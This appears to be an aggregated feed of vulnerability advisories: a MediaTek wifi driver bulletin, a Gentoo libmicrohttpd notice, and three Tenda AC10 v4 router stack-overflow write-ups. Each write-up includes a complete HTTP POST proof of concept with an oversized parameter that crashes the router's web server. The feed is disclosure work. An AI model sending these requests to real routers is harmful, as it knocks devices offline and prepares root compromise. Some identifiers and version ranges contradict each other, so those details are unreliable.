In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26445**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

****Vulnerability Type Definition****

Abbreviation

**Definition**

RCE

Remote Code Execution

EoP

Elevation of Privilege

ID

Information Disclosure

DoS

Denial of Service

N/A

Classification not available

****Versions****

**Version**

**Date**

**Description**

1.0

August 1, 2022

Bulletin published.

****Notes****

Information above is generated only at the time of creation of this Security Bulletin. The list of affected chipsets could be not complete. For any further information, device OEMs can reach your MediaTek contact person if needed.

If you want to report a security vulnerability in MediaTek chipsets or products, please go to Report Security Vulnerability page on MediaTek website.

CVE-2022-21788: August 2022

Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter devName at /goform/SetOnlineDevName.

\# Tenda AC10 v4 was discovered stack overflow via parameter devName at url /goform/SetOnlineDevName ###### tags: \`Tenda\` \`AC10 v4\` vendor:Tenda product:AC10 v4 version:US\_AC10V4.0si\_V16.03.10.13\_cn type:Stack Overflow author:Yifeng Li，Wolin Zhuang，Shencai Zhu; ## Vulnerability Description Tenda AC10 v4 US\_AC10V4.0si\_V16.03.10.13\_cn was discovered to contain a stack overflow via parameter devName at url /goform/SetOnlineDevName. ## Vulnerability Details In function formSetDeviceName line 9, the content obtained by parameter 'devName' is passed into v4 without check, then passed into function set\_device\_name. !\[\](https://i.imgur.com/PKg9SiC.png) In function set\_device\_name, local variable v4 is 256 bytes long.In line 45, devName's content is formatted into v4 by sprintf without checking its length, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/X2rLEwQ.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router AC10 v4 to newest version(we have a physical machine) 2. Login to 192.168.0.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/KIbBHOV.png) !\[\](https://i.imgur.com/Z4h96yE.png) \`\`\` POST /goform/SetOnlineDevName HTTP/1.1 Host: 192.168.0.1 Content-Length: 3036 Accept: \*/\* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.0.1 Referer: http://192.168.0.1/parental\_control.html?random=0.3320562258410147& Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: password=f6fdffe48c908deb0f4c3bd36c032e72kjkcvb Connection: close devName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=94:b8:6d:74:0f:9a \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of httpd process. !\[\](https://i.imgur.com/4qI5LlZ.png) And you can write your own exp to get the root shell.

CVE-2023-34570: Tenda AC10 v4 was discovered stack overflow via parameter devName at url /goform/SetOnlineDevName - HackMD

Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter list at /goform/SetNetControlList.

\# Tenda AC10 v4 was discovered stack overflow via parameter list at url /goform/SetNetControlList ###### tags: \`Tenda\` \`AC10 v4\` vendor:Tenda product:AC10 v4 version:US\_AC10V4.0si\_V16.03.10.13\_cn type:Stack Overflow author:Yifeng Li，Wolin Zhuang，Shencai Zhu; ## Vulnerability Description Tenda AC10 v4 US\_AC10V4.0si\_V16.03.10.13\_cn was discovered to contain a stack overflow via parameter list at url /goform/SetNetControlList. ## Vulnerability Details In function formSetQosBand line 10, v2 is a a user-controlled parameter('list') and is read in without length check, which is passed into funcition set\_qosMib\_list later. !\[\](https://hackmd.io/\_uploads/HkFmEMMB2.png) In function set\_qosMib\_list, a1's content is controlled by user, in line 41, a1's content is copied into src. !\[\](https://hackmd.io/\_uploads/Hk08EfzS3.png) Then in line 49, src's content is copied into local variable v8,which leads to a stack overflow vulnerbility. !\[\](https://hackmd.io/\_uploads/rydRVGfr2.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router AC10 v4 to newest version(we have a physical machine) 2. Login to 192.168.0.1 as admin 3. Attack with the following POC !\[\](https://hackmd.io/\_uploads/B17y8gMS2.png) !\[\](https://hackmd.io/\_uploads/r1YfrfGr3.png) \`\`\` POST /goform/SetNetControlList HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: \*/\* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 3093 list=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of httpd process. !\[\](https://hackmd.io/\_uploads/ryGSUMMrn.png) And you can write your own exp to get the root shell.

CVE-2023-34569: Tenda AC10 v4 was discovered stack overflow via parameter list at url /goform/SetNetControlList - HackMD

Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter list at /goform/SetVirtualServerCfg.

\# Tenda AC10 v4 was discovered stack overflow via parameter list at url /goform/SetVirtualServerCfg ###### tags: \`Tenda\` \`AC10 v4\` vendor:Tenda product:AC10 v4 version:US\_AC10V4.0si\_V16.03.10.13\_cn type:Stack Overflow author:Yifeng Li，Wolin Zhuang，Shencai Zhu; ## Vulnerability Description Tenda AC10 v4 US\_AC10V4.0si\_V16.03.10.13\_cn was discovered to contain a stack overflow via parameter list at url /goform/SetVirtualServerCfg. ## Vulnerability Details In function formSetVirtualSer line 9, v3 is a a user-controlled parameter('list') and is read in without length check. Later in line 10, v3 is passed into function save\_virtualser\_data. !\[\](https://hackmd.io/\_uploads/BJ-1nGfBh.png) Then in function save\_virtualser\_data, line 35, the content of a2(v3) is copied to v5.Then in line 42, the content of v5 is formatted into variable v12-v15,which leads to a stack overflow vulnerbility. !\[\](https://hackmd.io/\_uploads/SyXE3zzHn.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router AC10 v4 to newest version(we have a physical machine) 2. Login to 192.168.0.1 as admin 3. Attack with the following POC !\[\](https://hackmd.io/\_uploads/B17y8gMS2.png) !\[\](https://hackmd.io/\_uploads/r1FanGzH3.png) \`\`\` POST /goform/SetVirtualServerCfg HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: \*/\* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 3093 list=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of httpd process. !\[\](https://hackmd.io/\_uploads/BkP0nGzBh.png) And you can write your own exp to get the root shell.

CVE-2023-34567: Tenda AC10 v4 was discovered stack overflow via parameter list at url /goform/SetVirtualServerCfg - HackMD

Gentoo Linux Security Advisory 202311-8 - A buffer overflow vulnerability has been discovered in GNU Libmicrohttpd. Versions greater than 0.9.70 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GNU Libmicrohttpd: Buffer Overflow Vulnerability  
     Date: November 25, 2023  
     Bugs: #778296  
       ID: 202311-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A buffer overflow vulnerability has been discovered in GNU  
Libmicrohttpd.

Background  
=========  
GNU libmicrohttpd is a small C library that makes it easy to run an HTTP  
server as part of another application. GNU Libmicrohttpd is free  
software and part of the GNU project.

Affected packages  
================  
Package                 Vulnerable    Unaffected  
----------------------  ------------  ------------  
net-libs/libmicrohttpd  = 0.9.70      > 0.9.70

Description  
==========  
A buffer overflow vulnerability has been discovered in GNU  
Libmicrohttpd. Please review the CVE identifier referenced below for  
details.

Impact  
=====  
A missing bounds check in the post_process_urlencoded function leads to  
a buffer overflow, allowing a remote attacker to write arbitrary data in  
an application that uses libmicrohttpd. The highest threat from this  
vulnerability is to data confidentiality and integrity as well as system  
availability.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All GNU Libmicrohttpd users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">net-libs/libmicrohttpd-0.9.70"

References  
=========  
[ 1 ] CVE-2021-3466  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3466

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-08

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Search

lenovo warranty check/lookup | check warranty status | lenovo support us